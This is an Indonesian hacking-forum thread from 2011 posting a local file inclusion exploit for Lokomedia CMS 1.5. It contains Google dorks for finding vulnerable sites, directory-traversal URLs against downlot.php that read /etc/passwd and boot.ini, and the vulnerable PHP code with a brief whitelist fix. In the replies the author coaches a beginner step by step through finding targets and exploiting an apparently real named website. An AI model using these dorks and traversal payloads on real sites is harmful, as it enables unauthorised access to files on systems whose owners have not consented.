Threaded Mode | Linear Mode

***wenkhairu*** · (This post was last modified: 04-04-2011 01:20 AM by wenkhairu.)

Code:

# Exploit Title    : Lokomedia CMS 1.5 Local file Inclution 

# Google Dork      : "2011 Powered By Lokomedia" 

# Date        : 2011/03/04

# Author        : unkn0w

# Webiste        : http://devilzc0de.org

# Software Link    : http://bukulokomedia.com/lokomedia-1.5.rar

# Version        : 1.5 (posible to all version) 

# Tested on    : windows XP, windows 7, ubuntu 10.10

Code:

Gratz to All devilzc0de crew & intern0t crew & indonesia

Code:

Exploit & POC

-------------------

http://host/downlot.php?file=[LFI]

http://host/downlot.php?file=../../../../../boot.ini

http://host/downlot.php?file=../../../../../etc/passwd

PHP Code:

#bug on downlot.php
$filename = $_GET['file'];# -> [ not filtered ] 
$file_extension = strtolower(substr(strrchr($filename,"."),1)); #-> [ tidak memeriksa jenis extensi yang asli ]
if ($file_extension=='php') #-> [ hanya string php (bukan mime), kemungkinan bisa di bypass dengan null byte %00 ] 

PHP Code:

#simple way to fix the bug
$filetipe = array('pdf','rar','zip','doc','png','jpeg','jpg','ppt','exe');
if(!in_array($file_extension,$filetipe)){
    // your code
} 

badwolves1986 [RJ] · 04-04-2011, 01:19 AM

ajibbbb mantap bang tak cobain dulu hmm

od3yz · 04-04-2011, 03:13 AM

wah kaka dewa post, mantap

kaka,izin pelajari kaka
wenk wank wonk samar emang ajiippppp
mantap

selfdefense · 04-04-2011, 12:26 PM

mantap mastah wenk.. ijin nyimak dan.. belajar

ane mo nge patch web kampus ane euy.. soalnya pake loko juga..m

makasih.. smiley_beer

**-188** · 04-04-2011, 12:34 PM

dewa ne

1ngk4 · 04-04-2011, 06:05 PM

maaf cara gunaiinya bgaimna yah om stress

bisa kasih penjelasan secara sederhan ga om sabar

***wenkhairu*** · 04-04-2011, 06:31 PM

(04-04-2011 06:05 PM)1ngk4 Wrote: maaf cara gunaiinya bgaimna yah om

bisa kasih penjelasan secara sederhan ga om

tinggal cari di google dengan dork "2011 By Lokomedia"

trus kalo dapet, masuk halaman downlot.php

misal ini webnya

Code:

http://nursanah.com

trus masuk ke halaman download

Code:

http://nursanah/downlot.php?file=belajar_cinta.zip

trus rubah urlnya jadi

Code:

http://nursanah/downlot.php?file=../../../../../etc/passwd

Syamil007 · 08-09-2011, 04:48 AM

wah ini nih sumber ilmu.....
mangstab om....
asik

hakimoxz · 08-09-2011, 05:30 AM

Quote:tinggal cari di google dengan dork "2011 By Lokomedia"

trus kalo dapet, masuk halaman downlot.php

misal ini webnya
Code:
http://nursanah.com

trus masuk ke halaman download
Code:
http://nursanah/downlot.php?file=belajar_cinta.zip

trus rubah urlnya jadi
Code:
http://nursanah/downlot.php?file=../../../../../etc/passwd

kalau bug ini apa dah lama ?
caranya apa sam?

Code:

allinurl:/media.php?module=berita

Possibly Related Threads...
Thread:		Author	Replies:	Views:	Last Post
	[Tutor] Com_kunena Upload file	ohara_inamiji	12	631	05-26-2013 07:41 AM Last Post: Crabboy
	DOS ip pada local area dengan ettercap	dxfandy19	11	177	04-21-2013 02:19 PM Last Post: ghosthands
	[Tutor] POC + Exploit Wordpress ~ Video Blogging Arbitrary File Upload	Regel	11	718	02-02-2013 12:19 AM Last Post: copaker21
	Butuh Local Exploit Kernel Server	AnonymousOpsID	2	180	11-24-2012 08:37 PM Last Post: AnonymousOpsID
	#DiyWeb Admin Bypass dan Remote file/shell Upload exploit	AnonymousOpsID	4	353	11-06-2012 05:07 PM Last Post: rock_me
	kernel-2.6.18-164 2010 Local Root Exploit	numlock	5	356	08-11-2012 11:37 PM Last Post: d4rk_kn19ht
	CMS Schoolhos - Remote Arbitrary File Upload	nuxbie_cyber	10	357	06-28-2012 06:47 PM Last Post: Loex
	belajar bareng local exploit	alessandra	17	809	04-14-2012 09:10 PM Last Post: jackerp
	KasKus File Upload Vulnerability ?	rusuh	24	1,065	04-13-2012 05:23 PM Last Post: KING_cobra
	[Localroot Exploit] Linux Kernel CVE-2012-0056 Local Privilege Escalation	Regel	3	217	02-14-2012 10:54 PM Last Post: Regel